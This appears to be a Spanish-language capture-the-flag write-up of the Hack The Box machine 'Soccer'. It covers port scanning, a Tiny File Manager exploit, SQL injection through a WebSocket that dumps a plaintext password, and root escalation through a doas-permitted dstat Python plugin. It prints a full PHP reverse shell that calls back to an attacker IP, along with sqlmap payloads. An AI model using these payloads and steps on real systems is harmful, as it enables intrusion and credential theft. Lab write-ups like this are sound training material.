Soccer

Soccer Linuz · Easy - Adventure mode

🔭 Reconocimiento:

┌──(pmartinezr㉿kali)-[~/htb/soccer]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.108.247
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-03 23:04 +0100
Nmap scan report for 10.129.108.247
Host is up (0.047s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
|   256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_  256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest:
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Tue, 03 Feb 2026 22:04:44 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest:
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Tue, 03 Feb 2026 22:04:44 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.98%I=7%D=2/3%Time=698270F7%P=x86_64-pc-linux-gnu%r(inf
SF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x2
SF:0close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\n
SF:Content-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCon
SF:tent-Length:\x20139\r\nDate:\x20Tue,\x2003\x20Feb\x202026\x2022:04:44\x
SF:20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=
SF:\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</h
SF:ead>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HTT
SF:POptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Poli
SF:cy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r
SF:\nDate:\x20Tue,\x2003\x20Feb\x202026\x2022:04:44\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<met
SF:a\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Ca
SF:nnot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HTT
SF:P/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-sr
SF:c\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20t
SF:ext/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Tue,\x
SF:2003\x20Feb\x202026\x2022:04:44\x20GMT\r\nConnection:\x20close\r\n\r\n<
SF:!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"ut
SF:f-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x
SF:20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r
SF:(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnecti
SF:on:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,2F,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nConnection:\x20close\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.38 seconds

dirsearch -u http://soccer.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 20481
Output File: /home/pmartinezr/reports/http_soccer.htb/_26-02-07_14-12-09.txt
Target: http://soccer.htb/
[14:12:09] Starting:
[14:14:05] 301 -  178B  - /tiny  ->  http://soccer.htb/tiny/

Con dirsearch encontramos el directorio tiny eso sí, necesitas un diccionario que no sea el de dirsearch por defecto.

CVE-2021-45010

💣 Preparación:

https://www.exploit-db.com/exploits/50828

┌──(pmartinezr㉿kali)-[~/htb/soccer]
└─$ bash exploit.sh   http://soccer.htb/tiny/  admin \"admin@123\"
/usr/bin/curl
[✔] Curl found!
/usr/bin/jq
[✔] jq found!
[+]  Login Success! Cookie: filemanager=k0i5uqagtnkq89etadhvogrnm3
jq: parse error: Invalid numeric literal at line 1, column 10
[-] Can't find WEBROOT! Using default /var/www/html
[-] File Upload Unsuccessful! Exiting!

El exploit no funciona al completo, pero consigue sacar la cookie.
sustituyendo nuestra cookie en el navegador por esta y entramos con las credenciales por defecto. admin:admin@123

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.15.67';
$port = 4444;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; bash -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0);  // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

Generé esta revershell de PHP con el generador de https://www.revshells.com/

👽 Acciones:

┌──(pmartinezr㉿kali)-[~/htb/soccer]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.67] from (UNKNOWN) [10.129.113.240] 52958
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
17:46:11 up 28 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (982): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:/$
nginx-config
www-data@soccer:/home/player$ cat /etc/nginx/sites-available/soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}

Recogemos la conexión con netcat y tenemos una conexión inicial. Podemos empezar a investigar y descubrimos un segundo dominio soc-player.soccer.htb

🔭 Reconocimiento:

<script>
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {
var btn = document.getElementById('btn');
var input = document.getElementById('id');
ws.onopen = function (e) {
console.log('connected to the server')
}
input.addEventListener('keypress', (e) => {
keyOne(e)
});
function keyOne(e) {
e.stopPropagation();
if (e.keyCode === 13) {
e.preventDefault();
sendText();
}
}
function sendText() {
var msg = input.value;
if (msg.length > 0) {
ws.send(JSON.stringify({
"id": msg
}))
}
else append("????????")
}
}
ws.onmessage = function (e) {
append(e.data)
}
function append(msg) {
let p = document.querySelector("p");
// let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
// p.style.color = randomColor;
p.textContent = msg
}
</script>

Si investigamos la web del dominio http://soc-player.soccer.htb/, una vez nos registremos, vamos a encontrar la url http://soc-player.soccer.htb/check y en código fuente de la misma vamos a encontrar un script en javascript que indica que se conecta a algún lado por websocket ws://soc-player.soccer.htb:9091

www-data@soccer:~/html$ ss -putonal
Netid   State    Recv-Q   Send-Q     Local Address:Port      Peer Address:Port  Process
udp     UNCONN   0        0          127.0.0.53%lo:53             0.0.0.0:*
udp     UNCONN   0        0                0.0.0.0:68             0.0.0.0:*
tcp     LISTEN   0        151            127.0.0.1:3306           0.0.0.0:*
tcp     LISTEN   0        511              0.0.0.0:80             0.0.0.0:*      users:(("nginx",pid=1039,fd=6),("nginx",pid=1038,fd=6))
tcp     LISTEN   0        4096       127.0.0.53%lo:53             0.0.0.0:*
tcp     LISTEN   0        128              0.0.0.0:22             0.0.0.0:*
tcp     LISTEN   0        511            127.0.0.1:3000           0.0.0.0:*
tcp     LISTEN   0        511              0.0.0.0:9091           0.0.0.0:*
tcp     LISTEN   0        70             127.0.0.1:33060          0.0.0.0:*
tcp     LISTEN   0        511                 [::]:80                [::]:*      users:(("nginx",pid=1039,fd=7),("nginx",pid=1038,fd=7))

Nunca está de más intentar averiguar que puertos escuchan en la máquina, descubrimos un servidor Mysql puerto 3306 (o al menos lo parece)

sqlmap  --level 5 --risk 3 --data='{"id":"abcd"}' --url "ws://soc-player.soccer.htb:9091" -t 10 --dbms="mysql" --dbs
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-6989 OR 6801=6801"}
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: {"id":"(CASE WHEN (9421=9421) THEN SLEEP(5) ELSE 9421 END)"}
---
[22:01:03] [INFO] testing MySQL
[22:01:03] [INFO] confirming MySQL
[22:01:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[22:01:03] [INFO] fetching database names
[22:01:03] [INFO] fetching number of databases
[22:01:03] [INFO] resumed: 5
[22:01:03] [INFO] resumed: mysql
[22:01:03] [INFO] resumed: information_schema
[22:01:03] [INFO] resumed: performance_schema
[22:01:03] [INFO] resumed: sys
[22:01:03] [INFO] resumed: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
┌──(pmartinezr㉿kali)-[~/htb/soccer]
└─$ sqlmap  --level 5 --risk 3 --data='{"id":"abcd"}' --url "ws://soc-player.soccer.htb:9091" -t 10 --dbms="mysql" -D soccer_db --dump-all
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

El parametro id del json que se envía por socket es vulnerable OR boolean-based blind Descubrimos una password en texto plano. Grave error de administración.

👽 Acciones:

┌──(pmartinezr㉿kali)-[~/htb/soccer]
└─$ ssh player@soccer.htb
player@soccer:~$ cat user.txt
211018fa465c2a7d************
player@soccer:~$ find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat

Podemos reutilizar la password descubierta para obtener la flag de usuario. Comenzamos la escalada de privilegios y descubrimos doas, una alternativa a sudo. Nos muestra que podemos utilizar el comando dstat con doas. Posiblemente sea el vector para escalar privilegios

💣 Preparación:

https://gtfobins.org/gtfobins/dstat/ dstat le permite ejecutar scripts arbitrarios de Python cargados como “complementos externos” si están ubicados en uno de los directorios indicados en la página del manual de dstat en “ARCHIVOS”: ~/.dstat/ (path of binary)/plugins/ /usr/share/dstat/ /usr/local/share/dstat/

player@soccer:~$ find / -name dstat 2>/dev/null
/usr/share/doc/dstat
/usr/share/dstat
/usr/local/share/dstat
/usr/bin/dstat

Bsucamos los posibles directorios donde podemos meter los scripts/módulos que podemos ejecutar con dstat

👽 Acciones:

player@soccer: nano /usr/local/share/dstat/dstat_shell.py

El nombre del script llevará un prefijo stat_

import os
os.execl("/bin/sh", "sh")

Creamos nuestro script de escalada en python

player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --list
internal:
aio,cpu,cpu-adv,cpu-use,cpu24,disk,disk24,disk24-old,epoch,fs,int,int24,io,ipc,load,lock,mem,mem-adv,net,page,page24,proc,raw,socket,swap,swap-old,sys,
tcp,time,udp,unix,vm,vm-adv,zones
/usr/share/dstat:
battery,battery-remain,condor-queue,cpufreq,dbus,disk-avgqu,disk-avgrq,disk-svctm,disk-tps,disk-util,disk-wait,dstat,dstat-cpu,dstat-ctxt,dstat-mem,fan,freespace,
fuse,gpfs,gpfs-ops,helloworld,ib,innodb-buffer,innodb-io,innodb-ops,jvm-full,jvm-vm,lustre,md-status,memcache-hits,mongodb-conn,mongodb-mem,mongodb-opcount,
mongodb-queue,mongodb-stats,mysql-io,mysql-keys,mysql5-cmds,mysql5-conn,mysql5-innodb,mysql5-innodb-basic,mysql5-innodb-extra,mysql5-io,mysql5-keys,net-packets,nfs3,
nfs3-ops,nfsd3,nfsd3-ops,nfsd4-ops,nfsstat4,ntp,postfix,power,proc-count,qmail,redis,rpc,rpcd,sendmail,snmp-cpu,snmp-load,snmp-mem,snmp-net,snmp-net-err,
snmp-sys,snooze,squid,test,thermal,top-bio,top-bio-adv,top-childwait,top-cpu,top-cpu-adv,top-cputime,top-cputime-avg,top-int,top-io,top-io-adv,top-latency,
top-latency-avg,top-mem,top-oom,utmp,vm-cpu,vm-mem,vm-mem-adv,vmk-hba,vmk-int,vmk-nic,vz-cpu,vz-io,vz-ubc,wifi,zfs-arc,zfs-l2arc,zfs-zil
/usr/local/share/dstat:
shell

Comprobamos que ha sido incluído en los directorios de dstat

player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --shell
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
# whoami
root
# cat /root/root.txt
809b80cb7a27f67d************

Ya solo queda lanzar el script con doas y se produce la escalada

achivement